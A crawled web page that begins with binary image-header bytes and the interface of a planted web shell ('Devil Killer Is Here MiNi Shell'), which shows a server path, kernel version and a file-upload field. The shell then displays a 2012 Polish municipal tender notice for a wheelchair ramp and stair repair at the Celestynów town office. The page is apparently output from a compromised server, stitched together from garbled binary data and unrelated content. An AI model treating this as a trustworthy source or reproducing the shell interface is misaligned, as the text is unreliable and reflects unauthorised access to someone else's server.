JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121211/503890-N-2012.html

<p class="kh_header"><b>Celestynów: Budowa pochylni zewnętrznej dla osób niepełnosprawnych i remont schodów wejściowych do Urzędu Gminy w Celestynowie</b><br>
<b>Numer ogłoszenia: 503890 - 2012; data zamieszczenia: 11.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Celestynów , ul. Regucka 3, 05-430 Celestynów, woj. mazowieckie, tel. 22 7897060 w. 114, faks 22 7897011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.celestynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa pochylni zewnętrznej dla osób niepełnosprawnych i remont schodów wejściowych do Urzędu Gminy w Celestynowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zgodnie z załączonym projektem: Budowy pochylni zewnętrznej dla osób niepełnosprawnych i remont schodów wejściowych do Urzędu Gminy w Celestynowie, Gmina Celestynów.
3.2. 	Przedmiotowa inwestycja obejmować będzie:
3.2.1. 	Prace rozbiórkowe.
3.2.2. 	Roboty żelbetonowe, brukarskie, okładzinowe i wykończeniowe.
3.3. 	Prace rozbiórkowe polegały będą na:
3.3.1. Zerwaniu posadzek z masy lastrykowej, stopni oraz podstopni, podestów, słupów;
3.3.2.	Rozbiórce elementów konstrukcji betonowych niezbrojnych o grubości ponad 15cm,
podkłady, i schody;
3.3.3. Rozbiórce elementów konstrukcji betonowych zbrojonych - ławy;
3.3.3.	Wykopaniu fundamentów wykonane ręcznie z przewozem gruntu taczkami na odległość 10metrów. Grunt kat III;
3.3.4.	Ręcznym zasypaniu wykopów liniowych o ścianach pionowych, głębokość wykopu do 1,5 metra i szerokość 0,8-1,5m. Grunt kat. III-IV wraz z zagęszczeniem;
3.3.5.	Ułożeniu i rozbiórce pomostu drewnianego nad wykopem dla ruchu pieszego;
3.3.6.	Wywozu ziemi III kat, samochodami samowyładowczymi samowyładowczymi do 5 ton na odległość do 1 km;
3.3.7.	Wywozu gruzu z rozebranych konstrukcji żwirowobetonowych i żelbetonowych samochodami samowyładowczymi do 5 ton na odległość do 1km;
3.3.8.	Umocnieniu ścian wykopów w gruntach suchych balami drewnianymi pod obiekt specjalne wraz z rozbiórką;
3.3.9.	Podkłady betonowe na podłożu gruntowym;
3.3.10	Schody betonowe i żelbetonowe- stopnie betonowe zewnętrzne i wewnętrzne na gotowym podłożu z betonu C16/20 ( B20);
3.3.11.	Podstawy ścian oporowej żelbetonowej prostokątne o stopie płaskiej;
3.3.12.	Ściany oporowe żelbetonowe o wysokości do 3 metrów i przekroju prostokątnym, grubość do 20 cm;
3.3.13.	Zbrojenie konstrukcji monolitycznych budowli prętami stalowymi, okrągłymi, żebrowanymi O od 8-14mm;
3.3.14.	Zbrojenie konstrukcji  żelbetonowych elementów budynków i budowli prętami stalowymi okrągłymi, gładkimi O do 7mm. 

3.4.	Roboty żelbetonowe, brukarskie, okładzinowe i wykończeniowe:
3.4.1. 	Izolacje przeciw wilgociowe pionowe z roztwory asfaltowego wykonanie na zimno - pierwsza warstwa
3.4.2.	Izolacje przeciw wilgociowe pionowe dwoma warstwami papy asfaltowej na lepiku na gorąco, ław fundamentowych betonowych. Roztwór asfaltowy do gruntowania.
3.4.3.	Izolacje przeciw wilgociowe powłokowe, pionowe, z emulsji asfaltowej - następna warstwa
3.4.4.	Izolacje cieplne i przeciw dżwiękowe pionowe, z płyt styropianowych na zaprawie bez siatki metalowej.
3.4.5.	Rozebranie nawierzchni z kostki brukowej 14x12cm lub żużlowej 14x14 cm na podsypce piaskowej z wypełnieniem spoin piaskiem w torowiskach tramwajowych analogia.
3.4.6.	Podkłady na podłożu gruntowym z ubitego - żwir
3.4.7.	Wykonanie chodników z kostki brukowej o grubości 8 cm, kolorowej na podsypce piaskowej, spoiny wypełnione piaskiem, oraz opaski wokół budynku. 
3.4.8.	Uszczelnienie powierzchni poziomej pomieszczeń mokrych i wilgotnych ( łazienki, kuchnie, pralnie itp.) oraz balkonów i tarasów, wykonane pod okładziną ceramiczną, z płynnej folii uszczelniającej, bez wkładki z włókniny.
3.4.9.	Okładziny schodów z płytek na klej. Przygotowanie podłoża ( B.I.nr 8/96)
3.4.10.	Okładziny schodów z płytek kamiennych o grubości do 2cm na klej układanych metodą kombinowaną o wymiarach 30x30 cm ( B.I.nr 8/96) wraz z przygotowaniem podłoża podest, oraz słup.
3.4.11	Cokolik na schodach z płytek na klej układanych metodą kombinowaną. Przygotowanie podłoża. Cokolik o wysokości 15cm ( B.I.nr 8/96).
3.4.12.	Cokolik na schodach z płytek na klej układanych metodą kombinowaną z przecinaniem płytek. Cokolik o wysokości 15cm ( B.I.nr 8/96).
3.4.13.	Wangi grubości do 4cm długości 3,50
3.4.14	Stopnie proste okładzinowe kamienne granitowe o grubości 4cm i szerokości stopnia 35cm.
3.4.15.	Podstopnie proste okładzinowe kamienne granitowe o grubości do 2cm i szerokości stopnia 15cm.
3.4.16.	Balustrady schodowe z rur stalowych nierdzewnych przymocowane do policzków śrubami.
3.4.17.	Pochwyty ze stali nierdzewnej na wspornikach, pochwyty na murach oporowych schodów.
3.4.18.	Okładziny czapek murów oporowych z płyt prostokątnych kamiennych granitowych o grubości 4cm, nakrywa balustrad o szerokości 50cm.
3.4.19.	Przygotowanie starego podłoża pod docieplenie metodą lekką- mokrą, poprzez jednokrotne gruntowanie emulsją.
3.4.20.	Ręczne wykonanie cienkowarstwowej wyprawy z tynku akryl grubość 2mm, na Ścianach płaskich powierzchniowych poziom. Na uprzednio przygotowanym podłożu.
3.4.21.	Rozebranie rynien z blachy nadającej się do użytku analogia rury PVC.
3.4.22.	Rozebranie rur spustowych z blachy nadającej się do użytku.
3.4.23.	Montaż rynien dachowych półokrągłych z polichlorku winylu analogia montażu rynien z demontażu wraz z nowym usytuowaniem rur spustowych.
3.4.24.	Montaż rur spustowych okrągłych z polichlorku winylu materiał z demontażu.
3.4.25.	Wykonanie odwodnienia liniowego wraz z odprowadzeniem wody do istniejącej kanalizacji.
3.4.26. Dwukrotne malowanie elewacji, tynków gładkich farbami emulsyjnymi
3.5.	  Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, a także przedmiar robót, stanowiące załączniki do SIWZ.
3.6. 	W ramach zamówienia Wykonawca zobowiązany będzie do:
3.6.1. 	ponoszenia odpowiedzialności za jakość wykonanych robót, bezpieczeństwo wszelkich czynności i operacji na terenie budowy, metod budowy, metod użytych przy remoncie oraz za ich zgodność z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robót budowlanych i prawidłowe wykonanie wszystkich prac związanych z realizacją przedmiotu zamówienia zgodnie z aktualnie obowiązującymi normami polskimi, polskim prawem budowlanym wraz z aktami wykonawczymi do niego i innymi obowiązującymi przepisami;
3.6.2. 	stosowania podczas realizacji robót objętych umową wyłącznie wyrobów dopuszczonych do stosowania w budownictwie zgodnie z ustawą - Prawo budowlane. Materiały i urządzenia powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania                  w budownictwie określonym w ustawie z 16 kwietnia 2004 r. o wyrobach budowlanych  (Dz. U.      z 2004 r., Nr 92, poz. 881 z późn. zm.);
3.6.3. 	na każde żądanie Zamawiającego  lub Inspektora Nadzoru Wykonawca obowiązany jest okazać w stosunku do wskazanych wyrobów użytych do realizacji przedmiotu zamówienia, deklarację zgodności lub certyfikat zgodności z normami;
3.6.4. 	do niezwłocznego wykonania robót nieobjętych umową, jeżeli są one niezbędne ze względu na bezpieczeństwo lub zabezpieczenie przed awarią;
3.6.5.	zapewnienia ochrony mienia znajdującego się na terenie budowy, w szczególności pod względem przeciwpożarowym oraz BHP;
3.6.6. 	pisemnego powiadamiania Zamawiającego o planowanych odbiorach:
	a) częściowych - z wyprzedzeniem co najmniej 3 dni,
		b) robót zanikających - z wyprzedzeniem co najmniej 2 dni,
	c) końcowym - z wyprzedzeniem co najmniej 7 dni;
3.6.7. 	przekazania Zamawiającemu certyfikatów  na znak bezpieczeństwa, certyfikatów zgodności           i aprobat technicznych na materiały użyte do wykonania przedmiotu zamówienia zgodnie             z przepisami ustawy - Prawo budowlane;
3.6.8. 	przekazania Zamawiającemu inwentaryzacji powykonawczej w dwóch egzemplarzach najpóźniej w dniu odbioru  robót budowlanych;
3.6.9. 	ponoszenia odpowiedzialności za ochronę przekazanych mu punków pomiarowych do chwili odbioru ostatecznego robót. Uszkodzone lub zniszczone znaki geodezyjne Wykonawca odtworzy     i utrwali na własny koszt;
3.6.10.	zabezpieczenia i oznakowania terenu robót zgodnie z obowiązującymi w tym zakresie instrukcjami i przepisami prawa oraz uporządkowania terenu po zakończeniu robót. W miejscach przylegających do dróg otwartych dla ruchu, Wykonawca wyraźnie oznakuje teren robót budowlanych (jeżeli dotyczy). Wykonawca ponosi koszty urządzenia terenu budowy oraz koszty zużycia wody, energii i innych mediów;
3.6.11.	ponoszenia odpowiedzialności za wszelkie szkody wyrządzone osobom trzecim w trakcie realizacji robót objętych niniejsza umową oraz za szkody wynikające z wadliwego wykonania robót, ujawnione w okresie gwarancji jakości;
3.6.12.	ponoszenia odpowiedzialności za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych, a szkody wyrządzone podczas realizacji inwestycji Wykonawca zobowiązany jest naprawić niezwłocznie na własny koszt;
3.6.13. bieżącego oczyszczenia i usunięcia materiałów powstałych w czasie robót budowlanych oraz odtworzenia przyległego terenu po zakończeniu robót do stanu pierwotnego;
3.6.14.	udzielenia Zamawiającemu gwarancji na wykonane roboty. Okres gwarancji ustala się na                    36 miesięcy, licząc od daty podpisania bezusterkowego protokołu odbioru końcowego. W okresie gwarancji i rękojmi Wykonawca obowiązany jest do nieodpłatnego usuwania stwierdzonych wad.
 3.7. 	Wykonawca zapewni do obsługi przedmiotu zamówienia kierownika robót budowalnych.
 3.8. 	We wszystkich pozycjach, gdzie w dokumentacji podano przy określeniu wyrobów lub technologii nazwy własne lub pochodzenie Zamawiający dopuszcza rozwiązania i wyroby równoważne. Za równoważne Zamawiający przyjmie technologie i wyroby budowlane spełniające wymagania określone dla nich w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót przez autorów projektów. W przypadku zastosowania innych rozwiązań niż podane w dokumentacji projektowej, udowodnienie równoważności proponowanych rozwiązań spoczywa na Wykonawcy. Wykonawca musi zapewnić całkowitą  kompatybilność z urządzeniami i elementami określonymi w dokumentacji projektowej. 
  3.9.	Wykonawca zapewni  materiały, urządzenia i sprzęt niezbędny do wykonania przedmiotu zamówienia. 

W związku z rozliczeniem ryczałtowym Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia, a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.

Przedmiary robót stanowią dokumenty pomocnicze do obliczenia wartości zamówienia, nie są wyłączną podstawą obliczenia wartości zamówienia.

W przypadku nie zabezpieczenia środków finansowych  przez Radę Gminy Celestynów w budżecie Gminy na 2013 rok i Wieloletniej Prognozie Finansowej na lata 2013-2022 postępowanie o udzielenie zamówienia publicznego zostanie unieważnione.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, o których mowa w art. 67 ust.1 pkt. 6 Pzp. Przedmiot zamówień uzupełniających będzie polegał na powtórzeniu usług będących przedmiotem niniejszego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.26.23.10-4, 45.26.23.10-7, 45.32.00.00-6, 45.26.25.00-6, 45.22.31.00-7, 45.43.10.00-7, 45.26.25.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości: 5.000,00 zł (słownie:  pięć  tysięcy złotych) ważnym w okresie związania ofertą. 
8.2. 	Wadium może zostać wniesione zgodnie z zapisami art. 45 ust 6 Pzp. 
8.3. 	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, a dowód wniesienia wadium (kserokopia poświadczona za zgodność z oryginałem) powinien załączyć do oferty wraz z informacją, na jaki numer konta należy zwrócić wadium.
8.4. 	Wadium wnoszone w innej formie niż pieniądz, musi posiadać ważność co najmniej do końca terminu związania Wykonawcy, złożoną przez niego ofertą tj. 30 dni. Wniesienie wadium o krótszym terminie ważności skutkować będzie wykluczeniem Wykonawcy z niniejszego postępowania.
8.5. 	Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy o numerze:                      23 8001 0005 2002 0008 6091 0012, prowadzone przez: Bank Spółdzielczy w Otwocku oddział w Celestynowie, z następującą adnotacją: Remont schodów wejściowych do UG
8.6.  Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania wpłaty na rachunku bankowym Zamawiającego.
8.7. 	Wadium wnoszone w innej formie niż pieniężna Wykonawca złoży w Celestynowie przy ul. Reguckiej 3, Biurze Obsługi Mieszkańca - Urzędu Gminy w Celestynowie lub dołączy do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonania w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,       co najmniej 2 robót, których przedmiotem zamówienia było wykonanie  pochylni zewnętrznej dla osób niepełnosprawnych i remont schodów wejściowych   o wartości co najmniej 200.000,00 zł  brutto (dwieście tysięcy złotych brutto) każda, oraz potwierdzenia, że roboty te zostały wykonane należycie. W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego Załącznik nr 5 do SIWZ oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie  (np. bezusterkowe protokoły odbioru robót budowlanych,  referencje).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, lub inne, ważne, uprawnienia budowlane uprawniające do pełnienia funkcji kierownika budowy w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie obowiązujących przepisów. 
	Wykonawca zobowiązany jest przedłożyć wykaz sporządzony według wzoru stanowiącego Załącznik nr 6 do oferty. Wykaz winien zawierać szczegółowe informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, wraz ze wskazaniem podstawy do dysponowania osobą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedstawią opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia powinny być ważne w dniu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - sporządzony zgodnie z wzorem przedstawionym w Załączniku Nr 7 do SIWZ - jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
